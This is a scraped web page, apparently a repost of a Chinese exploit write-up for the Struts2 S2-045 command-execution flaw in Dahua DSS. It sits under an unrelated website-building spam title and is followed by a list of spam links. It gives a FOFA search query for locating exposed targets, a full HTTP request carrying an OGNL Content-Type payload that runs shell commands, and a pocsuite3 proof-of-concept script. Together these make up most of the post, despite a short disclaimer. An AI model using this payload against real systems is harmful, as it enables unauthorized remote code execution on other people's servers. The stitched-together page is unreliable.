当前位置: 首页 > news >正文

高端定制站开发昂昂溪网站建设

高端定制站开发,昂昂溪网站建设,山东省住房和城乡建设厅副厅长,苏州网络公司免责声明 文章中涉及的漏洞均已修复#xff0c;敏感信息均已做打码处理#xff0c;文章仅做经验分享用途#xff0c;切勿当真#xff0c;未授权的攻击属于非法行为#xff01;文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的…免责声明 文章中涉及的漏洞均已修复敏感信息均已做打码处理文章仅做经验分享用途切勿当真未授权的攻击属于非法行为文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失均由使用者本人负责作者不为此承担任何责任一旦造成后果请自行负责 漏洞描述 大华DSS存在s2-45漏洞。 fofa语句 body/portal/include/script/dahuaDefined/headCommon.js?typeindextitleDSS poc语句加检测 GET /admin/login_login.action HTTP/1.1 Host: Content-Type: %{(#nikemultipart/form-data).(#dmognl.OgnlContextDEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess#dm):((#container#context[com.opensymphony.xwork2.ActionContext.container]).(#ognlUtil#container.getInstance(com.opensymphony.xwork2.ognl.OgnlUtilclass)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmdls).(#iswin(java.lang.SystemgetProperty(os.name).toLowerCase().contains(win))).(#cmds(#iswin?{cmd.exe,/c,#cmd}:{/bin/bash,-c,#cmd})).(#pnew java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process#p.start()).(#ros(org.apache.struts2.ServletActionContextgetResponse().getOutputStream())).(org.apache.commons.io.IOUtilscopy(#process.getInputStream(),#ros)).(#ros.flush())} Accept-Encoding: gzip, deflate Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0 Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,*/*;q0.8 Accept-Language: zh-CN,zh;q0.8,zh-TW;q0.7,zh-HK;q0.5,en-US;q0.3,en;q0.2 poc脚本 脚本用的pocsuite框架 # _*_ coding:utf-8 _*_ # Time : 2023/12/09 19:02 # Author: 炼金术师诸葛亮 from pocsuite3.api import Output, POCBase, register_poc, requests, logger from pocsuite3.api import get_listener_ip, get_listener_port from pocsuite3.api import REVERSE_PAYLOAD, random_strclass dahua_strutsrce(POCBase):pocDesc 大华DSS-struts2-045命令执行author 炼金术师诸葛亮createDate 2023-12-09name 大华DSS-struts2-045命令执行def _verify(self):result {}path /admin/login_login.actionheaders {User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0,Content-Type: %{(#nikemultipart/form-data).(#dmognl.OgnlContextDEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess#dm):((#container#context[com.opensymphony.xwork2.ActionContext.container]).(#ognlUtil#container.getInstance(com.opensymphony.xwork2.ognl.OgnlUtilclass)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmdls).(#iswin(java.lang.SystemgetProperty(os.name).toLowerCase().contains(win))).(#cmds(#iswin?{cmd.exe,/c,#cmd}:{/bin/bash,-c,#cmd})).(#pnew java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process#p.start()).(#ros(org.apache.struts2.ServletActionContextgetResponse().getOutputStream())).(org.apache.commons.io.IOUtilscopy(#process.getInputStream(),#ros)).(#ros.flush())},Upgrade-Insecure-Requests: 1,Accept-Encoding: gzip, deflate,Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,*/*;q0.8,Accept-Language: zh-CN,zh;q0.8,zh-TW;q0.7,zh-HK;q0.5,en-US;q0.3,en;q0.2}url self.url pathtry:response requests.get(url, headersheaders,verifyFalse)# 验证成功输出相关信息print(response.text)if response.status_code 200 and bin in response.text:result[VerifyInfo] {}result[VerifyInfo][URL] self.urlreturn self.parse_output(result)except Exception as e:passregister_poc(dahua_strutsrce)脚本利用
http://www.yutouwan.com/news/147198/

相关文章:

  • 网站平台建设什么意思3d建模平台
  • 大学生网站建设小结wordpress能做论坛吗
  • 网站建设 东方网景vue消息推送和系统通知
  • 网站建设自学网站开发业务流程图
  • 企业网站seo优帮云做网站前端用什么
  • 擦边球做网站挣钱做海外视频的网站有哪些
  • 网站建设服务属于信息技术服务吗微信管理平台登录
  • 大型百度云网站建设关于做电影的网站设计
  • 企业网站找谁做摄影网站功能设计
  • 网站反链暴增怎么回事湄洲岛网站建设
  • 兰山区网站建设推广界面设计流程
  • 呢图网站场建设封面贵州seo和网络推广
  • 百度免费网站如何建设北京互联网平台
  • 网站建设类公桐城做网站的公司
  • 怎么建立网站 个人热点全国工商登记网
  • 网站开发是什么职业网络工程设计的概念
  • 网站建设导航栏变化wordpress adminlte
  • 网站软文制作网站申请流程
  • 网站的外部推广网站设计网站源码
  • 舒城县建设局网站最强的手机网站建设
  • 怎么在子域名建立一个不同的网站网站做好后
  • 网站维护工作内容有什么wordpress推广
  • 台州cms模板建站引流客户的最快方法是什么
  • 省厅网站建设招标北京网络广播电视台
  • 做壁纸网站的意义昌都网站建设
  • 如皋网站制作如何建立网站会员系统
  • 兰州新区城乡建设局网站境外网站
  • 网站主机地址福州品牌网站设计
  • 做网站需要代码么软件定制开发公司官网
  • 创建网站的步骤是1688一件代发跨境电商